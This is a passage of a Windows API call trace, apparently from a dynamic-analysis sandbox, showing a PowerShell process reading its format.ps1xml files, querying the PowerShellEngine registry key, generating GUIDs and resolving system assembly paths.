	[0695.728] ReadFile (in: hFile=0x2f4, lpBuffer=0x304bcf7, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x304bcf7*, lpNumberOfBytesRead=0x14d338*=0x0, lpOverlapped=0x0) returned 1
	[0695.728] ReadFile (in: hFile=0x2f4, lpBuffer=0x304c728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x304c728*, lpNumberOfBytesRead=0x14d338*=0x0, lpOverlapped=0x0) returned 1
	[0695.728] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3c8 | out: phkResult=0x14d3c8*=0x2f4) returned 0x0
	[0695.729] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d34c, lpData=0x0, lpcbData=0x14d348*=0x0 | out: lpType=0x14d34c*=0x1, lpData=0x0, lpcbData=0x14d348*=0x56) returned 0x0
	[0695.729] CoTaskMemAlloc (cb=0x5a) returned 0x1b7d2170
	[0695.729] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d31c, lpData=0x1b7d2170, lpcbData=0x14d318*=0x56 | out: lpType=0x14d31c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d318*=0x56) returned 0x0
	[0695.729] CoTaskMemFree (pv=0x1b7d2170) 
	[0695.729] RegCloseKey (hKey=0x2f4) returned 0x0
	[0695.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0695.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0695.731] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x329661f, Data2=0xc9ea, Data3=0x4c18, Data4=([0]=0x93, [1]=0x67, [2]=0x46, [3]=0xf2, [4]=0xbb, [5]=0x65, [6]=0x3a, [7]=0x1b))) returned 0x0
	[0695.731] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x7fd1f909, Data2=0x3da9, Data3=0x4b86, Data4=([0]=0xa2, [1]=0x36, [2]=0x3d, [3]=0x26, [4]=0xa9, [5]=0xef, [6]=0xc2, [7]=0xb5))) returned 0x0
	[0695.731] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xce857e3f, Data2=0x4c95, Data3=0x4290, Data4=([0]=0xac, [1]=0xbf, [2]=0xc5, [3]=0x2b, [4]=0x94, [5]=0xd5, [6]=0xeb, [7]=0xbd))) returned 0x0
	[0695.731] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x53f19046, Data2=0x4264, Data3=0x4e0c, Data4=([0]=0x9f, [1]=0x62, [2]=0x24, [3]=0xad, [4]=0xb3, [5]=0x83, [6]=0x92, [7]=0x62))) returned 0x0
	[0695.732] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x8d3094b9, Data2=0xd75, Data3=0x4eda, Data4=([0]=0x96, [1]=0x7f, [2]=0x77, [3]=0x5b, [4]=0x90, [5]=0x53, [6]=0xfb, [7]=0x9f))) returned 0x0
	[0695.732] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xcd41bdf1, Data2=0x519, Data3=0x4b34, Data4=([0]=0x9f, [1]=0xda, [2]=0xfb, [3]=0x8d, [4]=0x18, [5]=0x43, [6]=0x24, [7]=0x4c))) returned 0x0
	[0695.732] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x5df2049f, Data2=0xf11c, Data3=0x4984, Data4=([0]=0xb1, [1]=0x17, [2]=0xf9, [3]=0x2f, [4]=0x4b, [5]=0xf6, [6]=0x56, [7]=0xbd))) returned 0x0
	[0695.732] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xe75c1e6d, Data2=0xd7e7, Data3=0x47be, Data4=([0]=0x86, [1]=0x37, [2]=0xf5, [3]=0x1d, [4]=0x15, [5]=0x23, [6]=0x96, [7]=0x20))) returned 0x0
	[0695.732] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x70abf6de, Data2=0xbbbb, Data3=0x4bce, Data4=([0]=0xa6, [1]=0xcd, [2]=0x24, [3]=0xc9, [4]=0x30, [5]=0xc2, [6]=0x2e, [7]=0xbb))) returned 0x0
	[0695.732] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x59ffba0f, Data2=0xbcc1, Data3=0x4413, Data4=([0]=0xa8, [1]=0xd, [2]=0xc9, [3]=0x9d, [4]=0xf3, [5]=0xe8, [6]=0xd, [7]=0x52))) returned 0x0
	[0695.732] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x1e158c29, Data2=0x762b, Data3=0x45da, Data4=([0]=0xa3, [1]=0x22, [2]=0x38, [3]=0x1, [4]=0xf9, [5]=0xfb, [6]=0x43, [7]=0xb9))) returned 0x0
	[0695.733] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x1458b51f, Data2=0x736f, Data3=0x4f59, Data4=([0]=0xa6, [1]=0x5f, [2]=0x22, [3]=0xb9, [4]=0xf4, [5]=0xc, [6]=0x83, [7]=0xea))) returned 0x0
	[0695.733] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x8733b863, Data2=0xf68f, Data3=0x4555, Data4=([0]=0xa6, [1]=0x1b, [2]=0xd, [3]=0xd8, [4]=0x6, [5]=0x6e, [6]=0x52, [7]=0xc9))) returned 0x0
	[0695.733] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x5571b27c, Data2=0x3b02, Data3=0x40ab, Data4=([0]=0xaf, [1]=0x33, [2]=0x6a, [3]=0xad, [4]=0x28, [5]=0x5e, [6]=0x74, [7]=0x92))) returned 0x0
	[0695.733] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x11f1c085, Data2=0x90f7, Data3=0x40b7, Data4=([0]=0x95, [1]=0x13, [2]=0xeb, [3]=0x24, [4]=0x4e, [5]=0xa9, [6]=0x1f, [7]=0xec))) returned 0x0
	[0695.733] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x40594a14, Data2=0x3044, Data3=0x40d4, Data4=([0]=0xbe, [1]=0xd7, [2]=0x66, [3]=0x9d, [4]=0x96, [5]=0x71, [6]=0x57, [7]=0x9d))) returned 0x0
	[0695.734] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xc4ace554, Data2=0x5153, Data3=0x4a0d, Data4=([0]=0xb1, [1]=0x6e, [2]=0x10, [3]=0xad, [4]=0xab, [5]=0x56, [6]=0x17, [7]=0x55))) returned 0x0
	[0695.734] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xdbd267f9, Data2=0xc9a, Data3=0x446a, Data4=([0]=0x97, [1]=0xf5, [2]=0x9b, [3]=0xca, [4]=0x4b, [5]=0xbd, [6]=0xe0, [7]=0x9d))) returned 0x0
	[0695.734] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x3312bc14, Data2=0x3d83, Data3=0x4614, Data4=([0]=0xa5, [1]=0x83, [2]=0x7f, [3]=0x3b, [4]=0xd3, [5]=0xe5, [6]=0x85, [7]=0x3a))) returned 0x0
	[0695.734] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x474b889, Data2=0xbc3f, Data3=0x4998, Data4=([0]=0xb0, [1]=0x66, [2]=0xe3, [3]=0x69, [4]=0x36, [5]=0xfa, [6]=0xfa, [7]=0x8c))) returned 0x0
	[0695.734] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xc542c37e, Data2=0x121, Data3=0x4906, Data4=([0]=0xb9, [1]=0x3d, [2]=0xfb, [3]=0x4d, [4]=0xa9, [5]=0xc4, [6]=0xd2, [7]=0xf))) returned 0x0
	[0695.735] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x50b4d203, Data2=0xf98e, Data3=0x435c, Data4=([0]=0xa9, [1]=0x67, [2]=0x87, [3]=0xaf, [4]=0x82, [5]=0xed, [6]=0xa3, [7]=0x76))) returned 0x0
	[0695.735] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xe251d9e7, Data2=0xb2a5, Data3=0x4e56, Data4=([0]=0x9c, [1]=0x0, [2]=0xdb, [3]=0x63, [4]=0x17, [5]=0x30, [6]=0x41, [7]=0x17))) returned 0x0
	[0695.735] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xbe0cb963, Data2=0xb2c8, Data3=0x428d, Data4=([0]=0x93, [1]=0x3d, [2]=0xd1, [3]=0x5a, [4]=0x46, [5]=0x54, [6]=0xae, [7]=0xd5))) returned 0x0
	[0695.735] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xf8fccda1, Data2=0x85ea, Data3=0x4631, Data4=([0]=0x82, [1]=0x8d, [2]=0x2a, [3]=0x8e, [4]=0x43, [5]=0x9b, [6]=0x8a, [7]=0xc2))) returned 0x0
	[0695.735] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x9a40fee2, Data2=0xbb86, Data3=0x4403, Data4=([0]=0x94, [1]=0x84, [2]=0xc0, [3]=0x1a, [4]=0x26, [5]=0x45, [6]=0x5d, [7]=0x32))) returned 0x0
	[0695.735] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x2a902174, Data2=0x4abb, Data3=0x45dc, Data4=([0]=0x91, [1]=0xbd, [2]=0xb9, [3]=0x9, [4]=0xa9, [5]=0xdf, [6]=0xc9, [7]=0x11))) returned 0x0
	[0695.735] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xbed9cec7, Data2=0xabd, Data3=0x4114, Data4=([0]=0x84, [1]=0x3f, [2]=0xad, [3]=0xfa, [4]=0xc4, [5]=0xbd, [6]=0xef, [7]=0xcf))) returned 0x0
	[0695.736] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xc558c675, Data2=0xd7cf, Data3=0x44ef, Data4=([0]=0x89, [1]=0xcb, [2]=0x53, [3]=0x83, [4]=0xa2, [5]=0x20, [6]=0x2a, [7]=0xb9))) returned 0x0
	[0695.736] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x3995bb25, Data2=0x1323, Data3=0x46ca, Data4=([0]=0x84, [1]=0x44, [2]=0xf8, [3]=0x3a, [4]=0x82, [5]=0xe1, [6]=0x35, [7]=0xfb))) returned 0x0
	[0695.736] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x9d857e35, Data2=0x7feb, Data3=0x4c7e, Data4=([0]=0xb1, [1]=0xc1, [2]=0xd5, [3]=0xc6, [4]=0x21, [5]=0xb, [6]=0x17, [7]=0x75))) returned 0x0
	[0695.736] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x51b1357, Data2=0x2ef6, Data3=0x44e2, Data4=([0]=0xb0, [1]=0x9, [2]=0x9b, [3]=0x98, [4]=0xb9, [5]=0x1c, [6]=0x40, [7]=0xf1))) returned 0x0
	[0695.736] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xeb128b0f, Data2=0x54c7, Data3=0x4b0d, Data4=([0]=0x97, [1]=0xcf, [2]=0x94, [3]=0x93, [4]=0xe7, [5]=0x45, [6]=0xf5, [7]=0xbc))) returned 0x0
	[0695.737] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x8b6220d3, Data2=0xe702, Data3=0x41c4, Data4=([0]=0xa1, [1]=0xf4, [2]=0x1b, [3]=0x3f, [4]=0x6c, [5]=0x38, [6]=0x2b, [7]=0xd4))) returned 0x0
	[0695.738] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x4d3a9aaa, Data2=0x96cd, Data3=0x4069, Data4=([0]=0xa5, [1]=0x1f, [2]=0x70, [3]=0x3f, [4]=0xcc, [5]=0x73, [6]=0x8a, [7]=0x7c))) returned 0x0
	[0695.738] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xa10cff93, Data2=0x104d, Data3=0x4cee, Data4=([0]=0xa7, [1]=0xe, [2]=0x9b, [3]=0x7f, [4]=0x11, [5]=0xa2, [6]=0xd6, [7]=0x7c))) returned 0x0
	[0695.738] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x23dc260a, Data2=0x3398, Data3=0x4cb3, Data4=([0]=0x95, [1]=0x96, [2]=0xcb, [3]=0xc3, [4]=0xcc, [5]=0x39, [6]=0xcf, [7]=0x27))) returned 0x0
	[0695.738] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xbbbf22f5, Data2=0xcc80, Data3=0x41f3, Data4=([0]=0x98, [1]=0x55, [2]=0xa0, [3]=0xaa, [4]=0x2, [5]=0x77, [6]=0x71, [7]=0x7b))) returned 0x0
	[0695.738] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x4fe0c5b8, Data2=0x3d2, Data3=0x421a, Data4=([0]=0x90, [1]=0x27, [2]=0x7a, [3]=0xb0, [4]=0x7c, [5]=0xe, [6]=0x37, [7]=0xe7))) returned 0x0
	[0695.738] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x90bebc4e, Data2=0x45f, Data3=0x45a4, Data4=([0]=0xb7, [1]=0x78, [2]=0x74, [3]=0x21, [4]=0xe8, [5]=0xe0, [6]=0x9a, [7]=0xd8))) returned 0x0
	[0695.739] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x53bcad1e, Data2=0x3c30, Data3=0x466b, Data4=([0]=0xb2, [1]=0x80, [2]=0xa7, [3]=0xae, [4]=0x6d, [5]=0xfd, [6]=0xad, [7]=0x4e))) returned 0x0
	[0695.739] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x6fbedd3c, Data2=0x8dec, Data3=0x46ee, Data4=([0]=0xa3, [1]=0x48, [2]=0x59, [3]=0xd0, [4]=0xfb, [5]=0x6, [6]=0x6d, [7]=0xd6))) returned 0x0
	[0695.739] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xe846c332, Data2=0x3cca, Data3=0x4ddc, Data4=([0]=0x92, [1]=0xa5, [2]=0xe2, [3]=0x1a, [4]=0xa1, [5]=0xb5, [6]=0xb3, [7]=0xd1))) returned 0x0
	[0695.739] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x52152dd0, Data2=0x8cd3, Data3=0x449b, Data4=([0]=0xb3, [1]=0x55, [2]=0x7b, [3]=0xd, [4]=0xa7, [5]=0x63, [6]=0x60, [7]=0x9f))) returned 0x0
	[0695.739] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x2fbe1228, Data2=0x87bc, Data3=0x4f02, Data4=([0]=0x92, [1]=0xfc, [2]=0x5c, [3]=0xdd, [4]=0xf0, [5]=0x16, [6]=0x68, [7]=0x47))) returned 0x0
	[0695.739] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x363cb288, Data2=0xa19e, Data3=0x4eae, Data4=([0]=0xb4, [1]=0x81, [2]=0x8a, [3]=0x45, [4]=0xd4, [5]=0x15, [6]=0x91, [7]=0x12))) returned 0x0
	[0695.740] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xf9afaedc, Data2=0x3226, Data3=0x4e18, Data4=([0]=0xae, [1]=0x84, [2]=0x6b, [3]=0xf4, [4]=0x6d, [5]=0xcd, [6]=0xe6, [7]=0xb0))) returned 0x0
	[0695.740] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x6d49ae06, Data2=0x9154, Data3=0x4c03, Data4=([0]=0xae, [1]=0x7e, [2]=0xb2, [3]=0x61, [4]=0x26, [5]=0x74, [6]=0x20, [7]=0x6d))) returned 0x0
	[0695.740] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f4
	[0695.740] GetFileType (hFile=0x2f4) returned 0x1
	[0695.740] SetErrorMode (uMode=0x1) returned 0x1
	[0695.740] GetFileType (hFile=0x2f4) returned 0x1
	[0695.740] ReadFile (in: hFile=0x2f4, lpBuffer=0x31aa6c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31aa6c0*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0701.054] ReadFile (in: hFile=0x2f4, lpBuffer=0x31aa6c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31aa6c0*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0701.054] ReadFile (in: hFile=0x2f4, lpBuffer=0x31aa6c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31aa6c0*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0701.054] ReadFile (in: hFile=0x2f4, lpBuffer=0x31aa6c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31aa6c0*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0701.054] ReadFile (in: hFile=0x2f4, lpBuffer=0x31aa6c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31aa6c0*, lpNumberOfBytesRead=0x14d338*=0x8b4, lpOverlapped=0x0) returned 1
	[0701.054] ReadFile (in: hFile=0x2f4, lpBuffer=0x31a9adc, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31a9adc*, lpNumberOfBytesRead=0x14d338*=0x0, lpOverlapped=0x0) returned 1
	[0701.055] ReadFile (in: hFile=0x2f4, lpBuffer=0x31aa6c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31aa6c0*, lpNumberOfBytesRead=0x14d338*=0x0, lpOverlapped=0x0) returned 1
	[0701.055] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3c8 | out: phkResult=0x14d3c8*=0x2f4) returned 0x0
	[0701.055] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d34c, lpData=0x0, lpcbData=0x14d348*=0x0 | out: lpType=0x14d34c*=0x1, lpData=0x0, lpcbData=0x14d348*=0x56) returned 0x0
	[0701.055] CoTaskMemAlloc (cb=0x5a) returned 0x1b7d2170
	[0701.055] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d31c, lpData=0x1b7d2170, lpcbData=0x14d318*=0x56 | out: lpType=0x14d31c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d318*=0x56) returned 0x0
	[0701.055] CoTaskMemFree (pv=0x1b7d2170) 
	[0701.055] RegCloseKey (hKey=0x2f4) returned 0x0
	[0701.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0701.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0701.056] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x2b3dd89a, Data2=0x8029, Data3=0x479d, Data4=([0]=0x87, [1]=0x9d, [2]=0xd, [3]=0xf9, [4]=0xfe, [5]=0x61, [6]=0xe2, [7]=0x17))) returned 0x0
	[0701.056] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x93ac9871, Data2=0x36dc, Data3=0x4f33, Data4=([0]=0xa6, [1]=0xd5, [2]=0x47, [3]=0x73, [4]=0x66, [5]=0x88, [6]=0x47, [7]=0x8d))) returned 0x0
	[0701.057] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f4
	[0701.057] GetFileType (hFile=0x2f4) returned 0x1
	[0701.057] SetErrorMode (uMode=0x1) returned 0x1
	[0701.057] GetFileType (hFile=0x2f4) returned 0x1
	[0701.057] ReadFile (in: hFile=0x2f4, lpBuffer=0x31e84a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31e84a8*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0701.058] ReadFile (in: hFile=0x2f4, lpBuffer=0x31e84a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31e84a8*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0701.058] ReadFile (in: hFile=0x2f4, lpBuffer=0x31e84a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31e84a8*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0701.058] ReadFile (in: hFile=0x2f4, lpBuffer=0x31e84a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31e84a8*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0701.068] ReadFile (in: hFile=0x2f4, lpBuffer=0x2e57df0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x2e57df0*, lpNumberOfBytesRead=0x14d338*=0xe98, lpOverlapped=0x0) returned 1
	[0701.068] ReadFile (in: hFile=0x2f4, lpBuffer=0x2e57c48, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x2e57c48*, lpNumberOfBytesRead=0x14d338*=0x0, lpOverlapped=0x0) returned 1
	[0701.068] ReadFile (in: hFile=0x2f4, lpBuffer=0x2e57df0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x2e57df0*, lpNumberOfBytesRead=0x14d338*=0x0, lpOverlapped=0x0) returned 1
	[0701.068] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3c8 | out: phkResult=0x14d3c8*=0x2f4) returned 0x0
	[0701.068] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d34c, lpData=0x0, lpcbData=0x14d348*=0x0 | out: lpType=0x14d34c*=0x1, lpData=0x0, lpcbData=0x14d348*=0x56) returned 0x0
	[0701.068] CoTaskMemAlloc (cb=0x5a) returned 0x1b7d2170
	[0701.068] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d31c, lpData=0x1b7d2170, lpcbData=0x14d318*=0x56 | out: lpType=0x14d31c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d318*=0x56) returned 0x0
	[0701.069] CoTaskMemFree (pv=0x1b7d2170) 
	[0701.069] RegCloseKey (hKey=0x2f4) returned 0x0
	[0701.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0701.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0701.069] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x5079484b, Data2=0xdb2a, Data3=0x4ee4, Data4=([0]=0xa2, [1]=0x2b, [2]=0xd6, [3]=0xa5, [4]=0x93, [5]=0x85, [6]=0x9e, [7]=0xeb))) returned 0x0
	[0701.070] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xbb4d0417, Data2=0x5a88, Data3=0x4388, Data4=([0]=0x8b, [1]=0x49, [2]=0x39, [3]=0xca, [4]=0xff, [5]=0xd5, [6]=0x89, [7]=0xf7))) returned 0x0
	[0701.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0701.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0701.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0701.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
